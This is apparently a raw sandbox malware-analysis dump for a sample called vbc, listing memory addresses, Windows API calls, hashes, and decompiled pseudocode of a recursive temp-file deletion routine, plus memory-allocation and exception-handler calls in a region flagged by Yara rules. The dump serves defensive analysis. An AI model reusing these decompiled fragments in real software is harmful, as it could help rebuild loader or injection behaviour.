                                                0x73282177
                                                0x73282151
                                                0x73282152
                                                0x73282153
                                                0x73282156
                                                0x73282159
                                                0x7328215c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x7328215c
                                                0x00000000
                                                0x73281fa7
                                                0x00000000
                                                0x00000000
                                                0x73281fb3
                                                0x00000000
                                                0x00000000
                                                0x73281f9a
                                                0x73281f9e
                                                0x73281fa2
                                                0x00000000
                                                0x00000000
                                                0x7328211c
                                                0x73282120
                                                0x00000000
                                                0x00000000
                                                0x73282126
                                                0x7328212f
                                                0x73282136
                                                0x7328213e
                                                0x00000000
                                                0x00000000
                                                0x73282083
                                                0x73282083
                                                0x00000000
                                                0x00000000
                                                0x73281fbc
                                                0x00000000
                                                0x00000000
                                                0x732821a6
                                                0x00000000
                                                0x00000000
                                                0x7328208b
                                                0x7328208d
                                                0x7328208d
                                                0x00000000
                                                0x00000000
                                                0x73282196
                                                0x00000000
                                                0x00000000
                                                0x7328219a
                                                0x00000000
                                                0x00000000
                                                0x732821a2
                                                0x00000000
                                                0x00000000
                                                0x732820d3
                                                0x732820d5
                                                0x732820d5
                                                0x00000000
                                                0x00000000
                                                0x7328209d
                                                0x7328209f
                                                0x7328209f
                                                0x00000000
                                                0x00000000
                                                0x732820af
                                                0x732820b1
                                                0x732820b1
                                                0x00000000
                                                0x00000000
                                                0x732820e1
                                                0x732820e3
                                                0x732820e3
                                                0x00000000
                                                0x00000000
                                                0x732820ba
                                                0x732820bc
                                                0x732820bc
                                                0x00000000
                                                0x00000000
                                                0x732820c1
                                                0x00000000
                                                0x00000000
                                                0x7328219e
                                                0x732821a8
                                                0x732821a8
                                                0x00000000
                                                0x00000000
                                                0x732820ec
                                                0x732820f0
                                                0x732820f5
                                                0x732820f8
                                                0x732820f9
                                                0x732820fc
                                                0x73282102
                                                0x73282102
                                                0x00000000
                                                0x00000000
                                                0x7328218e
                                                0x00000000
                                                0x00000000
                                                0x732820c5
                                                0x732820c7
                                                0x732820c7
                                                0x00000000
                                                0x00000000
                                                0x73281fc3
                                                0x73281fc3
                                                0x00000000
                                                0x00000000
                                                0x732820da
                                                0x732820dc
                                                0x732820dc
                                                0x00000000
                                                0x00000000
                                                0x73281f67
                                                0x73281f6d
                                                0x73281f70
                                                0x73281f72
                                                0x73281f72
                                                0x73281f75
                                                0x73281f79
                                                0x73281f86
                                                0x73281f88
                                                0x73281f8e
                                                0x73281f8e
                                                0x73281f8e
                                                0x00000000
                                                0x00000000
                                                0x7328208e
                                                0x7328208e
                                                0x73282090
                                                0x73282097
                                                0x00000000
                                                0x00000000
                                                0x732820d6
                                                0x732820d6
                                                0x00000000
                                                0x00000000
                                                0x732820a0
                                                0x732820a0
                                                0x732820a2
                                                0x732820a9
                                                0x00000000
                                                0x00000000
                                                0x732820b2
                                                0x732820b2
                                                0x732820b4
                                                0x00000000
                                                0x00000000
                                                0x732820e4
                                                0x732820e4
                                                0x00000000
                                                0x00000000
                                                0x732820bd
                                                0x732820bd
                                                0x00000000
                                                0x00000000
                                                0x7328210a
                                                0x7328210e
                                                0x73282113
                                                0x73282116
                                                0x00000000
                                                0x00000000
                                                0x732820c8
                                                0x732820c8
                                                0x732820cb
                                                0x732820cd
                                                0x00000000
                                                0x00000000
                                                0x732820dd
                                                0x732820dd
                                                0x732820e6
                                                0x732820e6
                                                0x73281fc5
                                                0x73281fc5
                                                0x73281fc8
                                                0x73281fcf
                                                0x73281fd1
                                                0x73281fd3
                                                0x73281fda
                                                0x73281fdd
                                                0x73281fe2
                                                0x73281fe4
                                                0x73281fe6
                                                0x73281fea
                                                0x73281ff0
                                                0x73281ff6
                                                0x73281ff6
                                                0x73281ff8
                                                0x73281ff8
                                                0x73281ff9
                                                0x73281ff9
                                                0x73281ffd
                                                0x73282003
                                                0x73282005
                                                0x73282009
                                                0x7328200e
                                                0x7328200e
                                                0x73282010
                                                0x73282010
                                                0x73282013
                                                0x73282016
                                                0x7328201f
                                                0x73282025
                                                0x73282028
                                                0x73282028
                                                0x7328202a
                                                0x7328202d
                                                0x73282033
                                                0x73282039
                                                0x73282039
                                                0x7328203b
                                                0x00000000
                                                0x00000000
                                                0x73282041
                                                0x73282041
                                                0x73282045
                                                0x7328204c
                                                0x73282070
                                                0x73282070
                                                0x73282074
                                                0x73282076
                                                0x73282079
                                                0x73282079
                                                0x7328207c
                                                0x7328207c
                                                0x00000000
                                                0x73282074
                                                0x73282051
                                                0x73282054
                                                0x73282054
                                                0x7328205b
                                                0x7328205d
                                                0x73282060
                                                0x73282067
                                                0x73282068
                                                0x7328206e
                                                0x7328206e
                                                0x00000000
                                                0x7328206e
                                                0x73282062
                                                0x73282065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73282065
                                                0x73281ff2
                                                0x73281ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281f60
                                                0x73281e05
                                                0x73281e05
                                                0x73281e06
                                                0x73281f46
                                                0x00000000
                                                0x73281f46
                                                0x73281e0c
                                                0x73281e0d
                                                0x00000000
                                                0x00000000
                                                0x73281e13
                                                0x73281e16
                                                0x73281f0b
                                                0x73281f0b
                                                0x73281f0e
                                                0x73281f23
                                                0x73281f25
                                                0x73281f25
                                                0x73281f26
                                                0x73281f29
                                                0x73281f2c
                                                0x73281f38
                                                0x73281f38
                                                0x73281f38
                                                0x73281f2e
                                                0x73281f2e
                                                0x73281f2e
                                                0x73281f3e
                                                0x00000000
                                                0x73281f3e
                                                0x73281f10
                                                0x73281f10
                                                0x73281f11
                                                0x73281f1f
                                                0x00000000
                                                0x73281f1f
                                                0x73281f14
                                                0x73281f15
                                                0x00000000
                                                0x00000000
                                                0x73281f1b
                                                0x00000000
                                                0x73281f1b
                                                0x73281e1c
                                                0x73281f07
                                                0x00000000
                                                0x73281f07
                                                0x73281e22
                                                0x73281e22
                                                0x73281e25
                                                0x73281e4e
                                                0x00000000
                                                0x73281e4e
                                                0x73281e27
                                                0x73281e27
                                                0x73281e2a
                                                0x73281e44
                                                0x00000000
                                                0x73281e44
                                                0x73281e2c
                                                0x73281e2c
                                                0x73281e2f
                                                0x73281e3e
                                                0x00000000
                                                0x73281e3e
                                                0x73281e32
                                                0x73281e33
                                                0x00000000
                                                0x00000000
                                                0x73281e35
                                                0x00000000
                                                0x73281cec
                                                0x73281cec
                                                0x73281cef
                                                0x00000000
                                                0x73281cef
                                                0x73281ce6
                                                0x73281cd3
                                                0x73281cd8
                                                0x00000000
                                                0x00000000
                                                0x73281cda
                                                0x73281cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281cdd
                                                0x73281c6d
                                                0x73281c70
                                                0x73281ca6
                                                0x73281ca9
                                                0x00000000
                                                0x73281caf
                                                0x73281cb1
                                                0x73281cb5
                                                0x73281cbc
                                                0x73281cc3
                                                0x73281cc6
                                                0x73281cc9
                                                0x00000000
                                                0x73281cc9
                                                0x73281ca9
                                                0x73281c72
                                                0x73281c73
                                                0x73281c8e
                                                0x73281c91
                                                0x00000000
                                                0x73281c97
                                                0x73281c97
                                                0x73281c9e
                                                0x73281ca1
                                                0x00000000
                                                0x73281ca1
                                                0x73281c91
                                                0x73281c78
                                                0x00000000
                                                0x73281c7e
                                                0x73281c7e
                                                0x73281c85
                                                0x00000000
                                                0x73281c85
                                                0x73281c78
                                                0x73281e74
                                                0x73281e79
                                                0x73281e7e
                                                0x73281e82
                                                0x73282355
                                                0x7328235b
                                                0x73281e94
                                                0x73281e96
                                                0x73281e97
                                                0x7328227e
                                                0x7328227e
                                                0x73282281
                                                0x73282284
                                                0x732822a1
                                                0x732822a7
                                                0x732822a9
                                                0x732822af
                                                0x732822c6
                                                0x732822c6
                                                0x732822c6
                                                0x732822d3
                                                0x732822d9
                                                0x732822dc
                                                0x732822e2
                                                0x732822e4
                                                0x732822e8
                                                0x732822ea
                                                0x732822f1
                                                0x732822f6
                                                0x732822f9
                                                0x732822fb
                                                0x73282300
                                                0x73282312
                                                0x73282312
                                                0x73282300
                                                0x732822f9
                                                0x732822e8
                                                0x73282318
                                                0x7328231b
                                                0x73282325
                                                0x7328232d
                                                0x7328233a
                                                0x73282340
                                                0x73282343
                                                0x73282273
                                                0x73282273
                                                0x00000000
                                                0x73282273
                                                0x73282349
                                                0x7328234f
                                                0x7328234f
                                                0x00000000
                                                0x00000000
                                                0x73282351
                                                0x73282351
                                                0x73282351
                                                0x73282351
                                                0x00000000
                                                0x7328231d
                                                0x7328231d
                                                0x73282323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73282323
                                                0x7328231b
                                                0x732822b2
                                                0x732822b8
                                                0x732822ba
                                                0x732822c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732822c0
                                                0x73282286
                                                0x7328228d
                                                0x73282293
                                                0x73282299
                                                0x00000000
                                                0x73282299
                                                0x73281e9d
                                                0x73281e9e
                                                0x7328225d
                                                0x7328225d
                                                0x73282263
                                                0x73282266
                                                0x00000000
                                                0x00000000
                                                0x7328226d
                                                0x73282272
                                                0x00000000
                                                0x73282272
                                                0x73281ea5
                                                0x00000000
                                                0x00000000
                                                0x73281eab
                                                0x73281eab
                                                0x73281eb4
                                                0x73281eb9
                                                0x73281ebf
                                                0x00000000
                                                0x00000000
                                                0x73281ec5
                                                0x73281ed2
                                                0x73281ed8
                                                0x73281ee2
                                                0x73281ee8
                                                0x73281ef0
                                                0x73281f00
                                                0x00000000
                                                0x73281f00

                                                APIs
                                                  • Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73281D2D
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 73281D75
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 73281D7F
                                                • GlobalFree.KERNEL32(00000000), ref: 73281D92
                                                • GlobalFree.KERNEL32(?), ref: 73281E74
                                                • GlobalFree.KERNEL32(?), ref: 73281E79
                                                • GlobalFree.KERNEL32(?), ref: 73281E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 73282068
                                                • lstrcpyW.KERNEL32(?,?), ref: 73282222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 732822A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 732822B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 7328230C
                                                • lstrlenW.KERNEL32(00000808), ref: 73282326
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
                                                • Instruction ID: bde674b89ea2efbae24d9cf95df647bf0a9520796ee205eed234c3959f478019
                                                • Opcode Fuzzy Hash: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
                                                • Instruction Fuzzy Hash: F7228971E1030ADFDB129FA4C5847EEB7B4FB08315F24852AD1A6E62C4D7B4A6C1CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 676 405cc1-405cc2 call 405e58 670->676 677 405cb4-405cbf lstrcatW 670->677 671->668 675 405dba-405dbd 671->675 672->670 672->671 678 405dc7-405dcf call 406873 675->678 679 405dbf-405dc5 675->679 681 405cc7-405ccb 676->681 677->681 678->668 687 405dd1-405de5 call 405e0c call 405c01 678->687 679->668 684 405cd7-405cdd lstrcatW 681->684 685 405ccd-405cd5 681->685 686 405ce2-405cfe lstrlenW FindFirstFileW 684->686 685->684 685->686 688 405d04-405d0c 686->688 689 405da8-405dac 686->689 703 405de7-405dea 687->703 704 405dfd-405e00 call 40559f 687->704 691 405d2c-405d40 call 40653d 688->691 692 405d0e-405d16 688->692 689->671 694 405dae 689->694 705 405d42-405d4a 691->705 706 405d57-405d62 call 405c01 691->706 695 405d18-405d20 692->695 696 405d8b-405d9b FindNextFileW 692->696 694->671 695->691 699 405d22-405d2a 695->699 696->688 702 405da1-405da2 FindClose 696->702 699->691 699->696 702->689 703->679 707 405dec-405dfb call 40559f call 4062fd 703->707 704->668 705->696 708 405d4c-405d55 call 405c49 705->708 716 405d83-405d86 call 40559f 706->716 717 405d64-405d67 706->717 707->668 708->696 716->696 718 405d69-405d79 call 40559f call 4062fd 717->718 719 405d7b-405d81 717->719 718->696 719->696
                                                C-Code - Quality: 98%
                                                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405F14(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x434f88 =  *0x434f88 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E0040653D(0x42f270, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E58(_t68);
                                                					} else {
                                                						lstrcatW(0x42f270, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E0040653D(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405C01(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E0040559F(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x434f88 =  *0x434f88 + 1;
                                                										} else {
                                                											E0040559F(0xfffffff1, _t68);
                                                											E004062FD(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C49(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x42f270 - 0x5c;
                                                					if( *0x42f270 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406873(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405E0C(_t68);
                                                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E0040559F(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E0040559F(0xfffffff1, _t68);
                                                							return E004062FD(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x434f88 =  *0x434f88 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c53
                                                0x00405c58
                                                0x00405c61
                                                0x00405c64
                                                0x00405c6c
                                                0x00405c6f
                                                0x00405c72
                                                0x00405c7a
                                                0x00405c7c
                                                0x00405c7d
                                                0x00000000
                                                0x00405c7d
                                                0x00405c88
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8f
                                                0x00405ca2
                                                0x00405ca9
                                                0x00405cae
                                                0x00405cb2
                                                0x00405cc2
                                                0x00405cb4
                                                0x00405cba
                                                0x00405cba
                                                0x00405cc7
                                                0x00405ccb
                                                0x00405cd7
                                                0x00405cdd
                                                0x00405ce2
                                                0x00405ce8
                                                0x00405cf3
                                                0x00405cf9
                                                0x00405cfb
                                                0x00405cfe
                                                0x00405da8
                                                0x00405da8
                                                0x00405dac
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d04
                                                0x00405d04
                                                0x00405d04
                                                0x00405d0c
                                                0x00405d2c
                                                0x00405d34
                                                0x00405d39
                                                0x00405d40
                                                0x00405d5b
                                                0x00405d60
                                                0x00405d62
                                                0x00405d86
                                                0x00405d64
                                                0x00405d64
                                                0x00405d67
                                                0x00405d7b
                                                0x00405d69
                                                0x00405d6c
                                                0x00405d74
                                                0x00405d74
                                                0x00405d67
                                                0x00405d42
                                                0x00405d48
                                                0x00405d4a
                                                0x00405d50
                                                0x00405d50
                                                0x00405d4a
                                                0x00000000
                                                0x00405d40
                                                0x00405d0e
                                                0x00405d16
                                                0x00000000
                                                0x00000000
                                                0x00405d18
                                                0x00405d20
                                                0x00000000
                                                0x00000000
                                                0x00405d22
                                                0x00405d2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d8b
                                                0x00405d93
                                                0x00405d99
                                                0x00405d99
                                                0x00405da2
                                                0x00000000
                                                0x00405da2
                                                0x00405ccd
                                                0x00405cd5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c91
                                                0x00405c91
                                                0x00405c93
                                                0x00405db3
                                                0x00405db5
                                                0x00405db8
                                                0x00405e09
                                                0x00405e09
                                                0x00405e09
                                                0x00405dba
                                                0x00405dbd
                                                0x00405dc8
                                                0x00405dcd
                                                0x00405dcf
                                                0x00000000
                                                0x00000000
                                                0x00405dd2
                                                0x00405dde
                                                0x00405de3
                                                0x00405de5
                                                0x00000000
                                                0x00405e00
                                                0x00405de7
                                                0x00405dea
                                                0x00000000
                                                0x00000000
                                                0x00405def
                                                0x00000000
                                                0x00405df6
                                                0x00405dbf
                                                0x00405dbf
                                                0x00000000
                                                0x00405dbf
                                                0x00405c99
                                                0x00405c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c9c

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                • lstrcatW.KERNEL32 ref: 00405CBA
                                                • lstrcatW.KERNEL32 ref: 00405CDD
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-2602864334
                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406873(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x4302b8;
                                                			}




                                                0x0040687e
                                                0x00406887
                                                0x00000000
                                                0x00406894
                                                0x0040688a
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(286DCCCF,?,313A8EC5), ref: 03795804
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 320378bb17433be3b1c954e5864f63ce45e0e620effb490e451f2c30531167e6
                                                • Instruction ID: 2a2b80f19d8431964146d722c4272269a006f3ea39b84dc4820a1f10642d3ff4
                                                • Opcode Fuzzy Hash: 320378bb17433be3b1c954e5864f63ce45e0e620effb490e451f2c30531167e6
                                                • Instruction Fuzzy Hash: CF410FB56013888FEB749E28DD95BDF37A2EF59390F45412EEC8D9B210E7319A448B02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAddVectoredExceptionHandler.NTDLL(00000001,037982BF,-0000000153298D62,0379641C,00000000,037901AE), ref: 03798170
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionHandlerVectored
                                                • String ID:
                                                • API String ID: 3310709589-0
                                                • Opcode ID: 69365e01956e7cd565daaf395655f14a8abc30b9fe409a38869ac682a29ae20b
                                                • Instruction ID: 4d4718c8e85db8698c172fb31e31c72958cac98751bc861dc7b9541334b33bf1
                                                • Opcode Fuzzy Hash: 69365e01956e7cd565daaf395655f14a8abc30b9fe409a38869ac682a29ae20b
                                                • Instruction Fuzzy Hash: 6AF03731600A89CFEF24DE68CED93CA37A2AF89345F294639CC059F704C734A9898B01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
